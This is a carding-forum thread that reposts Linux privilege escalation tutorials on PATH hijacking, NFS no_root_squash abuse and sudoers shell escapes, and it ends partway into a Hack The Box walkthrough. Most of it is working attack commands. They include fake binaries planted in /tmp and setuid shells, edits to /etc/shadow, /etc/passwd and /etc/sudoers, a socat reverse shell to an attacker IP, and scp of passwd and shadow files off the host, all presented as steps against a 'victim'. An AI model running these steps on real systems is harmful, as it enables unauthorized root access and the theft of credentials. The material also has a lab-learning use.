[Guide] How to Linux Privilege Escalation Using PATH Variable

[Guide] How to Linux Privilege Escalation Using PATH Variable - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Linux Privilege Escalation Using PATH Variable (/Thread-Guide-How-to-Linux-Privilege-Escalation-Using-PATH-Variable)

[Guide] How to Linux Privilege Escalation Using PATH Variable - NINZA - 05-14-2020

After solving several OSCP Challenges, we have decided to write an article on the various methods used for Linux privilege escalation, that can be helpful for our readers in their penetration testing project. In this article, we will learn “various methods to manipulate $PATH variable” to gain root access of a remote host machine and the techniques used by CTF challenges to generate $PATH vulnerability that leads to Privilege escalation. If you have solved CTF challenges for Post exploit then by reading this article you will realize the several loopholes that lead to privileges escalation.
Let’s Start!!
Introduction
PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories that hold all executable programs are stored. When the user run any command on the terminal, its request to the shell to search for executable files with the help of PATH Variable in response to commands executed by a user. The superuser also usually has /sbin and /usr/sbin entries for easily executing system administration commands.
It is very simple to view the Path of the relevant user with help of echo command.
echo $PATH
1
echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
If you notice ‘.’ in environment PATH variable it means that the logged user can execute binaries/scripts from the current directory and it can be an excellent technique for an attacker to escalate root privilege. This is due to lack of attention while writing program thus admin does not specify the full path to the program.
Method 1
Ubuntu LAB SET_UP
Currently, we are in /home/raj directory where we will create a new directory with the name as the script. Now inside the script directory, we will write a small c program to call a function of system binaries.
pwd
mkdir script
cd script
nano demo.c
1
2
3
4
pwd
mkdir script
cd script
nano demo.c
[Image: 1.png?w=687]

As you can observe in our demo.c file we are calling ps command (Process status) which is system binaries.
[Image: 2.png?w=687]

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.
ls
gcc demo.c -o shell
chmod u+s shell
ls -la shell
1
2
3
4
ls
gcc demo.c -o shell
chmod u+s shell
ls -la shell
[Image: 3.png?w=687]

Privilege Escalation
First, you need to compromise the target system and then move to the privilege escalation phase. Suppose you successfully login into the victim’s machine through ssh. Then without wasting your time search for the file having SUID or 4000 permission with help of Find command.
find / -perm -u=s -type f 2>/dev/null
1
find / -perm -u=s -type f 2>/dev/null
Hence with the help of above command, an attacker can enumerate any executable file, here we can also observe /home/raj/script/shell having suid permissions.
[Image: 4.png?w=687]

Then we move into /home/raj/script and saw an executable file “shell”. So we run this file, and here it looks like this file is trying to run ps and this is a genuine file inside /bin to get Process status.
ls
./shell
1
2
ls
./shell
[Image: 5.png?w=687]

Echo Command -1st Technique to spawn root privilege

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoami
1
2
3
4
5
6
7
8
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoami
[Image: 6.png?w=687]

Copy Command -2nd Technique to spawn root privilege

cd /home/raj/script/
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:$PATH
./shell
whoami
1
2
3
4
5
6
cd /home/raj/script/
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:$PATH
./shell
whoami
[Image: 7.png?w=687]

Symlink command -3rd Technique to spawn root privilege

ln -s /bin/sh ps
export PATH=.:$PATH
./shell
id
whoami
1
2
3
4
5
ln -s /bin/sh ps
export PATH=.:$PATH
./shell
id
whoami
NOTE: symlink is also known as symbolic links that will work successfully if the directory has full permission. In Ubuntu, we had given permission 777 to /script directory in the case of a symlink.
Thus we saw to an attacker can manipulate environment variable PATH for privileges escalation and gain root access.
[Image: 8.1.png?w=687]

Method 2
Ubuntu LAB SET_UP
Repeat the same steps as above for configuring your own lab and now inside script directory, we will write a small c program to call a function of system binaries.
pwd
mkdir script
cd /script
nano test.c
1
2
3
4
pwd
mkdir script
cd /script
nano test.c
As you can observe in our test.c file we are calling id command which is system binaries.
[Image: 8.png?w=687]

After then compile the test.c file using gcc and promote SUID permission to the compiled file.
ls
gcc test.c -o shell2
chmod u+s shell2
ls -la shell2
1
2
3
4
ls
gcc test.c -o shell2
chmod u+s shell2
ls -la shell2
[Image: 9.png?w=687]

Privilege Escalation
Again, you need to compromise the target system and then move to the privilege escalation phase. Suppose you successfully login into the victim’s machine through ssh. Then without wasting your time search for the file having SUID or 4000 permission with help of Find command. Here we can also observe /home/raj/script/shell2 having suid permissions.
find / -perm -u=s -type f 2>/dev/null
1
find / -perm -u=s -type f 2>/dev/null
Then we move into /home/raj/script and saw an executable file “shell2”. So we run this file, it looks like the file shell2 is trying to run id and this is a genuine file inside /bin.
cd /home/raj/script/
ls
./shell2
1
2
3
cd /home/raj/script/
ls
./shell2
[Image: 10.png?w=687]

Echo command

cd /tmp
echo "/bin/bash" > id
chmod 777 id
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell2
whoami
1
2
3
4
5
6
7
8
cd /tmp
echo "/bin/bash" > id
chmod 777 id
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell2
whoami
[Image: 11.png?w=687]

Method 3
Ubuntu LAB SET_UP
Repeat above step for setting your own lab and as you can observe in our raj.c file we are calling cat command to read the content from inside etc/passwd file.
[Image: 12.png?w=687]

After then compile the raj.c file using gcc and promote SUID permission to the compiled file.
ls
gcc raj.c -o raj
chmod u+s raj
ls -la raj
1
2
3
4
ls
gcc raj.c -o raj
chmod u+s raj
ls -la raj
[Image: 13.png?w=687]

Privilege Escalation
Again compromised the Victim’s system and then move for privilege escalation phase and execute the below command to view sudo user list.
find / -perm -u=s -type f 2>/dev/null
1
find / -perm -u=s -type f 2>/dev/null
Here we can also observe /home/raj/script/raj having suid permissions, then we move into /home/raj/script and saw an executable file “raj”. So when we run this file it put-up etc/passwd file as result.
cd /home/raj/script/
ls
./raj
1
2
3
cd /home/raj/script/
ls
./raj
[Image: 14.png?w=687]

Nano Editor – 4th Technique to Privilege Escalation

cd /tmp
nano cat
1
2
cd /tmp
nano cat
Now type /bin/bash when terminal get open and save it.
[Image: 15.png?w=687]

chmod 777 cat
ls -al cat
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./raj
whoami
1
2
3
4
5
6
7
chmod 777 cat
ls -al cat
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./raj
whoami
[Image: 16.png?w=687]

Method 4
Ubuntu LAB SET_UP
Repeat above step for setting your own lab and as you can observe in our demo.c file we are calling cat command to read msg.txt which is inside /home/raj but there is no such file inside /home/raj.
[Image: 17.png?w=687]

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.
ls
gcc demo.c -o ignite
chmod u+s ignite
ls -la ignite
1
2
3
4
ls
gcc demo.c -o ignite
chmod u+s ignite
ls -la ignite
[Image: 18.png?w=687]

Privilege Escalation
Once again compromised the Victim’s system and then move for privilege escalation phase and execute the below command to view sudo user list.
find / -perm -u=s -type f 2>/dev/null
1
find / -perm -u=s -type f 2>/dev/null
Here we can also observe /home/raj/script/ignite having suid permissions, then we move into /home/raj/script and saw an executable file “ignite”. So when we run this file it put-up an error “cat: /home/raj/msg.txt” as result.
cd /home/raj/script/
ls
./ignite
1
2
3
cd /home/raj/script/
ls
./ignite
[Image: 19.png?w=687]

Vi Editor -5th Technique to Privilege Escalation

cd /tmp
vi cat
1
2
cd /tmp
vi cat
Now type /bin/bash when the terminal gets open and saves it.
[Image: 20.png?w=687]

chmod 777 cat
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./ignite
whoami
1
2
3
4
5
6
chmod 777 cat
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./ignite
whoami
[Image: 21.png?w=687]

After solving several OSCP Challenges we decided to write an article on the various methods used for Linux privilege escalation, which can be helpful for our readers in their penetration testing projects. In this article, we will learn how to exploit a misconfigured NFS share to gain root access to a remote host machine.
Table of Contents
Introduction of NFS
Misconfigured NFS Lab setup
Scanning NFS shares

Nmap script
showmount

Exploiting NFS server for Privilege Escalation via:
Bash file
C program file
Nano/vi

Obtain a shadow file
Obtain passwd file
Obtain sudoers file

Let’s Start!!
Network File System (NFS): Network File System permits a user on a client machine to mount the shared files or directories over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers. Although NFS uses TCP/UDP port 2049 for sharing any files/directories over a network.
Misconfigured NFS Lab setup
Basically, there are three core configuration files (/etc/exports, /etc/hosts.allow, and /etc/hosts.deny) you will need to configure to set up an NFS server. But to configure weak NFS server we will look only /etc/export file.
To install NFS service; execute below command in your terminal and open /etc/export file for configuration.
sudo apt-get update
sudo apt install nfs-kernel-server
nano /etc/exports
1
2
3
sudo apt-get update
sudo apt install nfs-kernel-server
nano /etc/exports
The /etc/exports file holds a record for each directory that you expect to share within a network machine. Each record describes how one directory or file is shared.
Apply basic syntax for configuration:
Directory Host-IP(Option-list)
There are various options will define which type of Privilege that machine will have over shared directory.

rw: Permit clients to read as well as write access to the shared directory.
ro: Permit clients to Read-only access to shared directory..
root_squash: This option Prevents file request made by user root on the client machine because NFS shares change the root user to the nfsnobody user, which is an unprivileged user account.
no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implication.
async: It will speed up transfers but can cause data corruption as NFS server doesn’t wait for the complete write operation to be finished on the stable storage, before replying to the client.
sync: The sync option does the inverse of async option where the NFS server will reply to the client only after the data is finally written to the stable storage.

Hopefully, it might be clear to you, how to configure the /etc/export file by using a particular option. An NFS system is considered weak or Misconfigured when following entry/record is edit into it for sharing any directory.
/home *(rw,no_root_squash)
1
/home *(rw,no_root_squash)
Above entry shows that we have shared /home directory and allowed the root user on the client to access files to read/ write operation and * sign denotes connection from any Host machine. After then restart the service with help of the following command.
sudo /etc/init.d/nfs-kernel-server restart
1
sudo /etc/init.d/nfs-kernel-server restart
[Image: 3.png?w=687]

Scanning NFS shares
Nmap
You can take help of Nmap script to scan NFS service in target network because it reveals the name of share directory of the target’s system if port 2049 is opened.
nmap -sV --script=nfs-showmount 192.168.1.102
1
nmap -sV --script=nfs-showmount 192.168.1.102
[Image: 4.png?w=687]

Basically nmap exports showmount -e command to identify the shared directory and here we can clearly observe /home * is shared directory for everyone in the network.
Showmount
The same thing can be done manually by using showmount command but for that install the nfs-common package on your local machine with help of the following command.
apt-get install nfs-common
showmount -e 192.168.1.102
1
2
apt-get install nfs-common
showmount -e 192.168.1.102
[Image: 5.png?w=687]

Exploiting NFS server for Privilege Escalation
Bash file
Now execute below command on your local machine to exploit NFS server for root privilege.
mkdir /tmp/raj
mount -t nfs 192.168.1.102:/home /tmp/raj
cp /bin/bash .
chmod +s bash
ls -la bash
1
2
3
4
5
mkdir /tmp/raj
mount -t nfs 192.168.1.102:/home /tmp/raj
cp /bin/bash .
chmod +s bash
ls -la bash
Above command will create a new folder raj inside /tmp and mount shared directory /home inside /tmp/raj. Then upload a local exploit to gain root by copying bin/bash and set suid permission.
[Image: 6.png?w=687]

Use df -h command to get a summary of the amount of free disk space on each mounted disk.
[Image: 7.png?w=687]

First, you need to compromise the target system and then move to the privilege escalation phase. Suppose you have successfully login into victim’s machine through ssh. Now we know that /home is shared directory, therefore, move inside it and follow below steps to get root access of victim’s machine.
cd /home
ls
./bash -p
id
whoami
1
2
3
4
5
cd /home
ls
./bash -p
id
whoami
So, it was the first method to pwn the root access with help of bin/bash if NFS system is configured weak.
[Image: 8.png?w=687]

C Program
Similarly, we can use C language program file for root privilege escalation. We have generated a C-Program file and copied it into /tmp/raj folder. Since it is c program file therefore first we need to compile it and then set suid permission as done above.
cp asroot.c /tmp/raj
cd /tmp/raj
gcc asroot.c -o shell
chmod +s shell
1
2
3
4
cp asroot.c /tmp/raj
cd /tmp/raj
gcc asroot.c -o shell
chmod +s shell
[Image: 9.png?w=687]

Now repeat the above process and run shell file to obtained root access.
cd /home
ls
./shell
id
whoami
1
2
3
4
5
cd /home
ls
./shell
id
whoami
So, it was the second method to pwn the root access with help of bin/bash via c-program if NFS system is misconfigured.
[Image: 10.png?w=687]

Nano/Vi
Nano and vi editor both are most dangerous applications that can lead to privilege escalation if share directly or indirectly. In our case, it not shared directly but still, we can use any application for exploiting root access.
Follow the below steps:
cp /bin/nano .
chmod 4777 nano
ls -la nano
1
2
3
cp /bin/nano .
chmod 4777 nano
ls -la nano
[Image: 11.png?w=687]

Since we have set suid permission to nano therefore after compromising target’s machine at least once we can escalate root privilege through various techniques.
cd /home
ls
./nano -p /etc/shadow
1
2
3
cd /home
ls
./nano -p /etc/shadow
[Image: 12.png?w=687]

When you will execute the above command it will open the shadow file, from where you can copy the hash password of any user.
[Image: 13.png?w=687]

Here I have copied hash password of the user: raj in a text file and saved as shadow then use john the ripper to crack that hash password.
Awesome!!! It tells raj having password 123. Now either you can login as raj and verify its privilege or follow the next step.
[Image: 14.png?w=687]

Passwd file
Now we know the password of raj user but we are not sure that raj has root privilege or not, therefore, we can add raj into the root group by editing etc/passwd file.
[Image: 16.png?w=687]

Open the passwd file with help of nano and make the following changes
./nano -p etc/passwd
raj:x:0:0:,,,:/home/raj:/bin/bash
1
2
./nano -p etc/passwd
raj:x:0:0:,,,:/home/raj:/bin/bash
[Image: 17.png?w=687]

Now use su command to switch user and enter the password found for raj.
su raj
id
whoami
1
2
3
su raj
id
whoami
Great!!! This was another way to get root access to the target machine.
[Image: 18.png?w=687]

Sudoers file
We can also escalate root privilege by editing the sudoers file where we can assign ALL privilege to our non-root user (ignite).
[Image: 19.png?w=687]

Open the sudoers file with help of nano and make the following changes
./nano -p /etc/sudoers
ignite ALL=(ALL:ALL) NOPASSWD: ALL
1
2
./nano -p /etc/sudoers
ignite ALL=(ALL:ALL) NOPASSWD: ALL
[Image: 20.png?w=687]

Now use sudo bash command to access root terminal and get root privilege
sudo bash
id
whoami
1
2
3
sudo bash
id
whoami
[Image: 21.png?w=687]

Conclusion: Thus we saw the various approach to escalated root privilege if port 2049 is open for NFS services and server is poorly configured. For your practice, you can play with ORCUS which is a vulnerable lab of vulnhub and read the article from

[To see content please register here]

.

In our previous articles, we have discussed Linux Privilege Escalation using

[To see content please register here]

and

[To see content please register here]

file and today we are posting another method of “Linux privilege Escalation using Sudoers file”. While solving CTF challenges, for privilege escalation we always check root permissions for any user to execute any file or command by executing sudo -l command. You can read our previous article where we had applied this trick for privilege escalation.
Let’s Start with Theoretical Concept!!
In Linux/Unix, a sudoers file inside /etc is the configuration file for sudo rights. We all know the power of sudo command, the word sudo represent Super User Do root privilege task. Sudoers file is that file where the users and groups with root privileges are stored to run some or all commands as root or another user. Take a look at the following image.
[Image: 1.png?w=687]

When you run any command along with sudo, it needs root privileges for execution, Linux checks that particular username within the sudoers file. And it concluded, that the particular username is in the list of sudoers file or not, if not then you cannot run the command or program using the sudo command. As per sudo rights the root user can execute from ALL terminals, acting as ALL users: ALL group, and run ALL command.
Sudoer File Syntax
If you (root user) wish to grant sudo right to any particular user then type visudo command which will open the sudoers file for editing. Under “user privilege specification” you will observe default root permission “root ALL=(ALL:ALL) ALL” BUT in actual, there is Tag option also available which is optional, as explained below in the following image.
Consider the given example where we want to assign sudo rights for user:raaz to access the terminal and run copy command with root privilege. Here NOPASSWD tag that means no password will be requested for the user.
NOTE:

(ALL:ALL) can also represent as (ALL)
If you found (root) in place of (ALL:ALL) then it denotes that user can run the command as root.
If nothing is a mention for user/group then it means sudo defaults to the root user.

Let’s Begin!!
Let’s get into deep through practical work. First, create a user which should be not the sudo group user. Here we have added user “raaz” who’s UID is 1002 and GID is 1002 and hence raaz is non-root user.
[Image: 2.png?w=687]

Traditional Method to assign Root Privilege
If the system administrator wants to give ALL permission to user raaz then he can follow the below steps to add user raaz under User Privilege Specification category.
visudo
raaz ALL=(ALL:ALL) ALL
or
raaz ALL=(ALL) ALL
1
2
3
4
visudo
raaz ALL=(ALL:ALL) ALL
or
raaz ALL=(ALL) ALL
[Image: 3.png?w=687]

Spawn Root Access
On other hands start your attacking machine and first compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh and want to know sudo rights for the current user then execute below command.
sudo -l
1
sudo -l
In the traditional method, PASSWD option is enabled for user authentication while executing the above command and it can be disabled by using NOPASSWD tag. The highlighted text is indicating that the current user is authorized to execute all command. Therefore we have obtained root access by executing the command.
sudo su
id
1
2
sudo su
id
[Image: 4.png?w=687]

Default Method to assign Root Privilege
If the system administrator wants to give root permission to user raaz to execute all command and program then he can follow below steps to add user raaz under User Privilege Specification category.
visudo
raaz ALL=ALL
or
raaz ALL=(root) ALL
1
2
3
4
visudo
raaz ALL=ALL
or
raaz ALL=(root) ALL
Here also Default PASSWD option is enabled for authentication.
[Image: 5.png?w=687]

Spawn Root Access
Again compromise the target system and then move for privilege escalation stage as done above and execute the below command to view sudo user list.
sudo -l
1
sudo -l
Here you can perceive the highlighted text which is representative that the user raaz can run all command as root user. Therefore we can achieve root access by performing further down steps.
sudo su
or
sudo bash
1
2
3
sudo su
or
sudo bash
Note: Above both methods will ask user’s password for authentication at the time of execution of sudo -l command because by Default PASSWD option is enabled.
[Image: 7.png?w=687]

Allow Root Privilege to Binary commands
Sometimes the user has the authorization to execute any file or command of a particular directory such as /bin/cp, /bin/cat or /usr/bin/ find, this type of permission lead to privilege escalation for root access and it can be implemented with help of following steps.
raaz ALL=(root) NOPASSWD: /usr/bin/find
1
raaz ALL=(root) NOPASSWD: /usr/bin/find
NOTE: Here NOPASSWD tag that means no password will be requested for the authentication while running sudo -l command.
[Image: 9.png?w=687]

Spawn Root Access using Find Command
Again compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list.
sudo -l
1
sudo -l
At this point, you can notice the highlighted text is indicating that the user raaz can run any command through find command. Therefore we got root access by executing below commands.
sudo find /home -exec /bin/bash \;
id
1
2
sudo find /home -exec /bin/bash \;
id
[Image: 11.png?w=687]

Allow Root Privilege to Binary Programs
Sometimes admin assigns delicate authorities to a particular user to run binary programs which allow a user to edit any system files such as /etc/passwd and so on. There are certain binary programs which can lead to privilege escalation if authorized to a user. In given below command we have assign sudo rights to the following program which can be run as root user.
raaz ALL= (root) NOPASSWD: /usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/vi
1
raaz ALL= (root) NOPASSWD: /usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/vi
[Image: 12.png?w=687]

Spawn shell using Perl
At the time of privilege, escalation phase executes below command to view the sudo user list.
sudo -l
1
sudo -l
Now you can observe the highlighted text is showing that the user raaz can run Perl language program or script as root user. Therefore we got root access by executing Perl one-liner.
sudo perl -e 'exec "/bin/bash";'
id
1
2
sudo perl -e 'exec "/bin/bash";'
id
[Image: 13.png?w=687]

Spawn shell using Python
After compromising the target system and then move for privilege escalation phase as done above and execute the below command to view the sudo user list.
sudo -l
1
sudo -l
At this point, you can perceive the highlighted text is indicating that the user raaz can run Python language program or script as root user. Thus we acquired root access by executing Python one-liner.
sudo python -c 'import pty;pty.spawn("/bin/bash")'
id
1
2
sudo python -c 'import pty;pty.spawn("/bin/bash")'
id
[Image: 14.png?w=687]

Spawn shell using Less Command
For the privilege, escalation phase executes below command to view the sudo user list.
sudo -l
1
sudo -l
[Image: 16.png?w=687]

Here you can observe the highlighted text which is indicating that the user raaz can run less command as root user. Hence we obtained root access by executing the following.
sudo less /etc/hosts
1
sudo less /etc/hosts
[Image: 17.png?w=687]

It will open requested system file for editing, BUT for spawning root shell type !bash as shown below and hit enter.
You will get root access as shown in the below image.
[Image: 18.png?w=687]

Spawn shell using AWK
After the compromise, the target system then moves for privilege escalation phase as done above and execute the below command to view the sudo user list.
sudo -l
1
sudo -l
At this phase, you can notice the highlighted text is representing that the user raaz can run AWK language program or script as root user. Therefore we obtained root access by executing AWK one-liner.
sudo awk 'BEGIN {system("/bin/bash")}'
id
1
2
sudo awk 'BEGIN {system("/bin/bash")}'
id
[Image: 19.png?w=687]

Spawn shell using Man Command (Manual page)
For privilege escalation and execute below command to view sudo user list.
sudo -l
1
sudo -l
Here you can observe the highlighted text is indicating that the user raaz can run man command as root user. Therefore we got root access by executing the following.
sudo man man
1
sudo man man
[Image: 20.png?w=687]

It will be displaying Linux manual pages for editing, BUT for spawning root shell type !bash as presented below and hit enter, you get root access as done above using Less command.
[Image: 21.png?w=687]

You will get root access as shown in the below image.
[Image: 24.png?w=687]

Spawn shell using Vi-editor (Visual editor)
After compromising the target system and then move for privilege escalation phase as done above and execute the below command to view the sudo user list.
sudo -l
1
sudo -l
Here you can observe the highlighted text which is indicating that user raaz can run vi command as root user. Consequently, we got root access by executing the following.
sudo vi
1
sudo vi
[Image: 22.png?w=687]

Thus, It will open vi editors for editing, BUT for spawning root shell type !bash as shown below and hit enter, you get root access as done above using Less command.
[Image: 23.png?w=687]

You will get root access as shown in the below image.
id
whoami
1
2
id
whoami
NOTE: sudo permission for less, nano, man, vi and man is very dangerous as they allow the user to edit system file and lead to Privilege Escalation.
[Image: 24.png?w=687]

Allow Root Privilege to Shell Script
There are maximum chances to get any kind of script for the system or program call, it can be any script either Bash, PHP, Python or C language script. Suppose you (system admin) want to give sudo permission to any script which will provide bash shell on execution.
For example, we have some scripts which will provide root terminal on execution, in given below image you can observe that we have written 3 programs for obtaining bash shell by using different programing language and saved all three files: asroot.py, asroot.sh, asroot.c (compiled file shell) inside bin/script.
NOTE: While solving OSCP challenges you will find that some script is hidden by the author for exploit kernel or for root shell and set sudo permission to any particular user to execute that script.
[Image: 25.png?w=687]

Now allow raaz to run all above script as root user by editing sudoers file with the help of the following command.
raaz ALL= (root) NOPASSWD: /bin/script/asroot.sh, /bin/script/asroot.py, /bin/script/shell
1
raaz ALL= (root) NOPASSWD: /bin/script/asroot.sh, /bin/script/asroot.py, /bin/script/shell
[Image: 26.png?w=687]

Spawn root shell by Executing Bash script
For the privilege, escalation phase executes below command to view the sudo user list.
sudo -l
1
sudo -l
The highlighted text is indicating that the user raaz can run asroot.sh as the root user. Therefore we got root access by running asroot.sh script.
sudo /bin/script/asroot.sh
id
1
2
sudo /bin/script/asroot.sh
id
[Image: 27.png?w=687]

Spawn root shell by Executing Python script
Execute below command for privilege escalation to view sudo user list.
sudo -l
1
sudo -l
At this time the highlighted text is showing that user raaz can run asroot.py as the root user. Therefore we acquired root access by executing the following script.
sudo /bin/script/asroot.py
id
1
2
sudo /bin/script/asroot.py
id
[Image: 28.png?w=687]

Spawn root shell by Executing C Language script
After compromising the target system and then move for privilege escalation and execute below command to view the sudo user list.
sudo -l
1
sudo -l
Here you can perceive the highlighted text is indicating that the user raaz can run shell (asroot.c compiled file) as the root user. So we obtained root access by executing the following shell.
sudo /bin/script/shell
id
1
2
sudo /bin/script/shell
id
[Image: 29.png?w=687]

Allow Sudo Right to other Programs
As we have seen above, some binary programs with sudo right are helpful in getting root access. But apart from that, there are some application which can also provide root access if owned sudo privilege such as FTP or socat. In given below command we have assign sudo rights to the following program which can be run as root user.
raaz ALL=(ALL) NOPASSWD: /usr/bin/env, /usr/bin/ftp, /usr/bin/scp, /usr/bin/socat
1
raaz ALL=(ALL) NOPASSWD: /usr/bin/env, /usr/bin/ftp, /usr/bin/scp, /usr/bin/socat
[Image: 0.png?w=687]

Spawn Shell Using Env
At the time of privilege escalation phase, executes below command to view sudo user list.
sudo -l
1
sudo -l
As we can observe user: raaz has sudo rights for env, FTP, SCP, and Socat, now let’s try to get root access through them one-by-one.
sudo env /bin/bash
whoami
1
2
sudo env /bin/bash
whoami
[Image: 1.png?w=687]

Spawn Shell Using FTP
Now let’s try to get root access through FTP with the help of following commands:
sudo ftp
! /bin/bash
whoami
or
! /bin/sh
id
whoami
1
2
3
4
5
6
7
sudo ftp
! /bin/bash
whoami
or
! /bin/sh
id
whoami
[Image: 2.png?w=687]

Spawn Shell Using Socat
Now let’s try to get root access through socat with the help of following commands. Execute below command on the attacker’s terminal in order to enable listener for reverse connection.
socat file:`tty`,raw,echo=0 tcp-listen:1234
1
socat file:`tty`,raw,echo=0 tcp-listen:1234
Then run the following command on victim’s machine and you will get root access on your attacker machine.
sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
1
sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
[Image: 3.png?w=687]

Spawn shell through SCP
As we know sudo right is available for SCP but it is not possible to get bash shell directory as shown above because it is a means of securely moving any files between a local host and a remote host. Therefore we can use it for transferring those system files which requires root permission to perform read/write operation such as /etc/passwd and /etc/shadow files.
Syntax: scp SourceFile user@host:~/path of the directory
sudo scp /etc/passwd [email protected]:~/
sudo scp /etc/shadow [email protected]:~/
1
2
sudo scp /etc/passwd [email protected]:~/
sudo scp /etc/shadow [email protected]:~/
[Image: 5.png?w=687]

Now let’s confirm the transformation by inspecting remote directory and as you can observe we have successfully received passwd and shadow files in our remote pc.
[Image: 6.png?w=687]

Today we are going to solve another CTF Challenge “Jeeves”. This VM is also developed by Hack the Box, Jeeves is a Retired Lab and there are multiple ways to breach into this VM. In this lab, we have escalated root privilege in 3 different ways and for completing the challenge of this VM we took help from

[To see content please register here]

(Hack the box).
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Penetrating Methodology

Network Scanning
Enumeration
Exploiting Script Console Groovy
Capture the user.txt
Privilege Escalation
Capture the root.txt Flag

Let’s Begin!!
Network Scanning
As these labs are only available online, therefore, they have a static IP. Jeeves Lab has IP: 10.10.10.63.
Now, as always let’s begin our hacking with the port enumeration.
nmap -A 10.10.10.63
1
nmap -A 10.10.10.63
Looking around its result we have found that ports 22, 80, 135, 445 and 50000 are open, and moreover, port 135 and 445 were pointing towards Windows operating system.
[Image: 1.png?w=687&ssl=1]

Subsequently, first we checked web service and explored target IP in a web browser and it was put up by “Ask Jeeves search engine” webpage. So we tried to search some website such as google.com and a new web page represented by the fake error page come up in front of us.
[Image: 2.png?w=687&ssl=1]

On browsing port 50000 in the Web browser give us to HTTP 404 Error page.
[Image: 3.png?w=687&ssl=1]

Enumeration
Then we decided to use OWASP Dirbuster for directory brute force attack.
[Image: 4.png?w=687&ssl=1]

From its result, we found so many directories but we drive with /askjeeves for further process.
[Image: 5.png?w=687&ssl=1]

So when we had explored 10.10.10.63:50000/askjeeves it leads us to “Jenkins Dashboard”. Oh yes!! It was WOW time for us because we knew that there are so many ways to exploit Jenkins. So we move into the “Manage Jenkins” option because it was the spine and abuse was pretty soothing.
[Image: 6.png?w=687&ssl=1]

Exploiting Jenkins
There were so many options, but we were interested in the Script Console because Jenkins has a very nice Groovy script console that allows someone to execute arbitrary Groovy scripts within the Jenkins master runtime.
[Image: 7.png?w=687&ssl=1]